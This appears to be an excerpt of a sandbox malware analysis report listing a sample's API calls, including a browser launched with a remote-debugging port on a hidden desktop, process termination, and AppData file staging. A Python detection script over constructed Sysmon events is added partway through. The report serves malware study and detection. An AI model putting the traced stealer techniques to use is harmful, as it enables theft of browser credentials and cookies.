                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FC181C
                                  • FindClose.KERNEL32(00000000), ref: 00FC182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: f756d32ec2c841d93260b2b1dba3f31d3ec7e29771549757505f2be4fcfca5d0
                                  • Instruction ID: 5718dc058a8eb674ac96fc2eb0c432852422c3e496be25a116a847a67a107125
                                  • Opcode Fuzzy Hash: f756d32ec2c841d93260b2b1dba3f31d3ec7e29771549757505f2be4fcfca5d0
                                  • Instruction Fuzzy Hash: ACC1803191020A9BDB25EFB5DD8ABEE77F8BF41314F04012CB856A7242DB38DC55AB90
                                  APIs
                                  • memset.MSVCRT ref: 00FB9790
                                  • lstrcat.KERNEL32(?,?), ref: 00FB97A0
                                  • lstrcat.KERNEL32(?,?), ref: 00FB97B1
                                  • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00FB97C3
                                  • memset.MSVCRT ref: 00FB97D7
                                    • Part of subcall function 00FD3E70: lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD3EA5
                                    • Part of subcall function 00FD3E70: lstrcpy.KERNEL32(00000000,01B9AA10), ref: 00FD3ECF
                                    • Part of subcall function 00FD3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00FB134E,?,0000001A), ref: 00FD3ED9
                                  • wsprintfA.USER32 ref: 00FB9806
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00FB9827
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00FB9844
                                    • Part of subcall function 00FD46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FD46B9
                                    • Part of subcall function 00FD46A0: Process32First.KERNEL32(00000000,00000128), ref: 00FD46C9
                                    • Part of subcall function 00FD46A0: Process32Next.KERNEL32(00000000,00000128), ref: 00FD46DB
                                    • Part of subcall function 00FD46A0: StrCmpCA.SHLWAPI(?,?), ref: 00FD46ED
                                    • Part of subcall function 00FD46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FD4702
                                    • Part of subcall function 00FD46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00FD4711
                                    • Part of subcall function 00FD46A0: CloseHandle.KERNEL32(00000000), ref: 00FD4718
                                    • Part of subcall function 00FD46A0: Process32Next.KERNEL32(00000000,00000128), ref: 00FD4726
                                    • Part of subcall function 00FD46A0: CloseHandle.KERNEL32(00000000), ref: 00FD4731
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB9878
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB9889
                                  • lstrcat.KERNEL32(00000000,00FE4B60), ref: 00FB989B
                                  • memset.MSVCRT ref: 00FB98AF
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00FB98D4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB9903
                                  • StrStrA.SHLWAPI(00000000,01B9DFE0), ref: 00FB9919
                                  • lstrcpyn.KERNEL32(011E93D0,00000000,00000000), ref: 00FB9938
                                  • lstrlen.KERNEL32(?), ref: 00FB994B
                                  • wsprintfA.USER32 ref: 00FB995B
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00FB9971
                                  • Sleep.KERNEL32(00001388), ref: 00FB99E7
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                    • Part of subcall function 00FB92B0: strlen.MSVCRT ref: 00FB92E1
                                    • Part of subcall function 00FB92B0: strlen.MSVCRT ref: 00FB92FA
                                    • Part of subcall function 00FB92B0: strlen.MSVCRT ref: 00FB9399
                                    • Part of subcall function 00FB92B0: strlen.MSVCRT ref: 00FB93E6
                                    • Part of subcall function 00FD4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00FD4759
                                    • Part of subcall function 00FD4740: Process32First.KERNEL32(00000000,00000128), ref: 00FD4769
                                    • Part of subcall function 00FD4740: Process32Next.KERNEL32(00000000,00000128), ref: 00FD477B
                                    • Part of subcall function 00FD4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FD479C
                                    • Part of subcall function 00FD4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00FD47AB
                                    • Part of subcall function 00FD4740: CloseHandle.KERNEL32(00000000), ref: 00FD47B2
                                    • Part of subcall function 00FD4740: Process32Next.KERNEL32(00000000,00000128), ref: 00FD47C0
                                    • Part of subcall function 00FD4740: CloseHandle.KERNEL32(00000000), ref: 00FD47CB
                                  • CloseDesktop.USER32(?), ref: 00FB9A1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 958055206-1862457068
                                  • Opcode ID: 2388e38ef69387c1c9dff48e45bf61b32b745e7645632d33020c085c4530b88e
                                  • Instruction ID: e4e3583531a3a55751fef7c89c69cc932d554d4adf0619394f4c58fff7d046cf
                                  • Opcode Fuzzy Hash: 2388e38ef69387c1c9dff48e45bf61b32b745e7645632d33020c085c4530b88e
                                  • Instruction Fuzzy Hash: 0C91A571900208ABDB64EFF4DC49FDE77B8AF44700F5440A9F619AB281DB74EA449FA0
                                  APIs
                                  • wsprintfA.USER32 ref: 00FCE22C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00FCE243
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FCE263
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FCE27D
                                  • wsprintfA.USER32 ref: 00FCE2A2
                                  • StrCmpCA.SHLWAPI(?,00FDCFEC), ref: 00FCE2B4
                                  • wsprintfA.USER32 ref: 00FCE2D1
                                    • Part of subcall function 00FCEDE0: lstrcpy.KERNEL32(00000000,?), ref: 00FCEE12
                                  • wsprintfA.USER32 ref: 00FCE2F0
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 00FCE304
                                  • lstrcat.KERNEL32(?,01B9E7B8), ref: 00FCE335
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FCE347
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE358
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FCE36A
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE37E
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00FCE394
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE3D2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE422
                                  • DeleteFileA.KERNEL32(?), ref: 00FCE45C
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FCE49B
                                  • FindClose.KERNEL32(00000000), ref: 00FCE4AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 1375681507-2848263008
                                  • Opcode ID: b2ed49548ebcb54efe2f8c3d27498048ee3c00cee8ec326db98aac854447c3e9
                                  • Instruction ID: 2272813c6ac67152566aaceb2c3fe21359f188293b6dc846c9180e0b0d930a57
                                  • Opcode Fuzzy Hash: b2ed49548ebcb54efe2f8c3d27498048ee3c00cee8ec326db98aac854447c3e9
                                  • Instruction Fuzzy Hash: F781A171D002199BCB24EFA5DD49EEE77BDBF44300F0449A8B51AA7140DB38EA84DFA1
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB16E2
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB176C
                                  • lstrcat.KERNEL32(00000000), ref: 00FB1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB17A2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB18FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat
                                  • String ID: \*.*
                                  • API String ID: 2276651480-1173974218
                                  • Opcode ID: d58b768a2cc8f7462bb8004676c116d619a1904d4125d2258fe6e9f5ccbde5ba
                                  • Instruction ID: aa5b85f17511cffe148a74dba500a8fa6329dc8e824c745dda9652fa9afefe8d
                                  • Opcode Fuzzy Hash: d58b768a2cc8f7462bb8004676c116d619a1904d4125d2258fe6e9f5ccbde5ba
                                  • Instruction Fuzzy Hash: 50818C3191024A9BCB21EFAADC99AEE77B9BF40314F540124F815AB245CB38DC41FFA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FCDD45
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FCDD4C
                                  • wsprintfA.USER32 ref: 00FCDD62
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00FCDD79
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FCDD9C
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FCDDB6
                                  • wsprintfA.USER32 ref: 00FCDDD4
                                  • DeleteFileA.KERNEL32(?), ref: 00FCDE20
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00FCDDED
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                    • Part of subcall function 00FCD980: memset.MSVCRT ref: 00FCD9A1
                                    • Part of subcall function 00FCD980: memset.MSVCRT ref: 00FCD9B3
                                    • Part of subcall function 00FCD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCD9DB
                                    • Part of subcall function 00FCD980: lstrcpy.KERNEL32(00000000,?), ref: 00FCDA0E
                                    • Part of subcall function 00FCD980: lstrcat.KERNEL32(?,00000000), ref: 00FCDA1C
                                    • Part of subcall function 00FCD980: lstrcat.KERNEL32(?,01B9E0B8), ref: 00FCDA36
                                    • Part of subcall function 00FCD980: lstrcat.KERNEL32(?,?), ref: 00FCDA4A
                                    • Part of subcall function 00FCD980: lstrcat.KERNEL32(?,01B9D640), ref: 00FCDA5E
                                    • Part of subcall function 00FCD980: lstrcpy.KERNEL32(00000000,?), ref: 00FCDA8E
                                    • Part of subcall function 00FCD980: GetFileAttributesA.KERNEL32(00000000), ref: 00FCDA95
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FCDE2E
                                  • FindClose.KERNEL32(00000000), ref: 00FCDE3D
                                  • lstrcat.KERNEL32(?,01B9E7B8), ref: 00FCDE66
                                  • lstrcat.KERNEL32(?,01B9D9B0), ref: 00FCDE7A
                                  • lstrlen.KERNEL32(?), ref: 00FCDE84
                                  • lstrlen.KERNEL32(?), ref: 00FCDE92
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCDED2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 4184593125-2848263008
                                  • Opcode ID: 48782fec66789f9c619f101c939450d8af34b66216bc8d3e75c927f8068619fd
                                  • Instruction ID: dffff229b4062fdd8467a9467c4a447d16320217cd92690d6aefa2f881af8f6b
                                  • Opcode Fuzzy Hash: 48782fec66789f9c619f101c939450d8af34b66216bc8d3e75c927f8068619fd
                                  • Instruction Fuzzy Hash: 06619271900209ABCB24EFF4DD89AEE77B9BF48310F0045A8B516A7245DB38EA84DF50
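Added detection example for the directory-staging routine above (the FindFirstFileA / CopyFileA / DeleteFileA sequence built on the `%s\*` and `%s\%s` format strings, with two StrCmpCA calls that are the usual "." and ".." skip); this is not code from the Joe Sandbox report or from the sample. The copy destination is built from SHGetFolderPathA with CSIDL 0x1A (CSIDL_APPDATA, i.e. %APPDATA%), CopyFileA is called with bFailIfExists = 1, and DeleteFileA follows, so on a host with Sysmon FileCreate (Event ID 11) and FileDelete (Event ID 23) logging the routine leaves create-then-delete pairs under AppData from one non-browser process. The script below correlates such records. Every event, path, PID and timestamp is constructed, the `stage` subfolder name and the 30-second window are assumptions, and the listing does not reveal the real destination folder or which files are copied.

```python
import ntpath
from collections import defaultdict
from datetime import datetime

# Constructed Sysmon-style records (EID 11 FileCreate, EID 23 FileDelete)
# flattened to one "key=value|key=value" line each.  Field names follow Sysmon;
# images, PIDs, paths and times are made up for this example.
SAMPLE_EVENTS = r"""
EventID=11|UtcTime=2024-11-23 10:15:01.100|Image=C:\Users\u\Desktop\file.exe|ProcessId=4120|TargetFilename=C:\Users\u\AppData\Roaming\stage\Login Data
EventID=11|UtcTime=2024-11-23 10:15:01.140|Image=C:\Users\u\Desktop\file.exe|ProcessId=4120|TargetFilename=C:\Users\u\AppData\Roaming\stage\Cookies
EventID=23|UtcTime=2024-11-23 10:15:02.300|Image=C:\Users\u\Desktop\file.exe|ProcessId=4120|TargetFilename=C:\Users\u\AppData\Roaming\stage\Login Data
EventID=23|UtcTime=2024-11-23 10:15:02.310|Image=C:\Users\u\Desktop\file.exe|ProcessId=4120|TargetFilename=C:\Users\u\AppData\Roaming\stage\Cookies
EventID=11|UtcTime=2024-11-23 10:16:00.000|Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ProcessId=6012|TargetFilename=C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
EventID=23|UtcTime=2024-11-23 10:16:00.050|Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ProcessId=6012|TargetFilename=C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
EventID=11|UtcTime=2024-11-23 10:20:00.000|Image=C:\Users\u\Desktop\file.exe|ProcessId=4120|TargetFilename=C:\Users\u\AppData\Roaming\stage\keep.txt
"""


def parse_events(text: str):
    """Turn the flattened lines into dicts; UtcTime becomes a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = dict(field.split("=", 1) for field in line.split("|"))
        ev["UtcTime"] = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        events.append(ev)
    return events


def is_under_appdata(path: str) -> bool:
    """CSIDL_APPDATA resolves to AppData\\Roaming; Local is covered as well."""
    p = path.lower()
    return "\\appdata\\roaming\\" in p or "\\appdata\\local\\" in p


def short_lived_appdata_files(events, window_s: float = 30.0):
    """Map (Image, ProcessId) -> basenames the process created under AppData
    and deleted again within window_s seconds.  Other events are ignored."""
    pending = {}                      # (pid, lowercased path) -> create time
    result = defaultdict(list)
    for ev in events:
        key = (ev["ProcessId"], ev["TargetFilename"].lower())
        if ev["EventID"] == "11" and is_under_appdata(ev["TargetFilename"]):
            pending[key] = ev["UtcTime"]
        elif ev["EventID"] == "23" and key in pending:
            age = (ev["UtcTime"] - pending.pop(key)).total_seconds()
            if age <= window_s:
                result[(ev["Image"], ev["ProcessId"])].append(
                    ntpath.basename(ev["TargetFilename"]))
    return dict(result)


def staging_alerts(events, min_files: int = 2, window_s: float = 30.0):
    """One process staging and removing several files under AppData in a short
    window is the pattern to alert on; a single journal file churned by a
    browser (the chrome.exe lines) stays below the threshold."""
    hits = short_lived_appdata_files(events, window_s)
    return {k: v for k, v in hits.items() if len(v) >= min_files}


if __name__ == "__main__":
    for (image, pid), files in staging_alerts(parse_events(SAMPLE_EVENTS)).items():
        print(f"{image} (pid {pid}) staged and deleted: {files}")
```

The threshold and window are tuning knobs: browsers and updaters create and remove single files under AppData constantly, so the rule keys on several files from one process in a burst rather than on any one path. The second directory walker listed below (wsprintfA / FindFirstFileA / lstrcat at 00FCD54D onwards) uses the same enumeration pattern without the copy, so it produces no file events of its own.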
                                  APIs
                                  • wsprintfA.USER32 ref: 00FCD54D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00FCD564
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FCD584
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FCD59E
                                  • lstrcat.KERNEL32(?,01B9E7B8), ref: 00FCD5E3
                                  • lstrcat.KERNEL32(?,01B9E958), ref: 00FCD5F7
                                  • lstrcat.KERNEL32(?,?), ref: 00FCD60B
                                  • lstrcat.KERNEL32(?,?), ref: 00FCD61C
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FCD62E
                                  • lstrcat.KERNEL32(?,?), ref: 00FCD642
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCD682
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCD6D2
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FCD737
                                  • FindClose.KERNEL32(00000000), ref: 00FCD746
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 50252434-4073750446
                                  • Opcode ID: 32fa52833cf89e844a2c4606776f16e3f3a73c70def310d5b2bdda2098dbbfbf
                                  • Instruction ID: 60540713abdc00ff786b121a0b011bae162cf34daa16252d7c629cf2f9c941c8
                                  • Opcode Fuzzy Hash: 32fa52833cf89e844a2c4606776f16e3f3a73c70def310d5b2bdda2098dbbfbf
